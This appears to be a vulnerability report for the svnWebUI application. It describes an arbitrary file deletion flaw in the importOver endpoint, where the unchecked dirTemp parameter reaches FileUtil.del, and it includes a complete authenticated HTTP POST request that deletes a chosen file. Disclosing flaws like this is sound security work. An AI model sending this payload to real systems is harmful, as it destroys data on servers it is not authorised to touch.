svnWebUI
svnWebUI copied to clipboard
cym1102
The svnwebui system has an arbitrary file deletion vulnerability
com.cym.controller.UserController#importOver
The system did not perform a security check on the parameter dirTemps,which allowed attackers to construct payloads and cause arbitrary file deletion
step in FileUtil.del,which could delete any file.
The following is the process of reproducing vulnerabilities:
The current path contains the file test:
After logging into the system,using this payload
`POST /adminPage/user/importOver HTTP/1.1
Host: 192.168.31.227:6060
Content-Length: 27
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.227:6060
Referer: http://192.168.31.227:6060/adminPage/user
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: SOLONID=c898caf824614a45a7032dc54291697d; Hm_lvt_2358d52bb43b2c7c42cb5a060c736de6=1712677313; Hm_lpvt_2358d52bb43b2c7c42cb5a060c736de6=1712677380
Connection: close
dirTemp=/home/svnWebUI/test`
The file has been deleted now
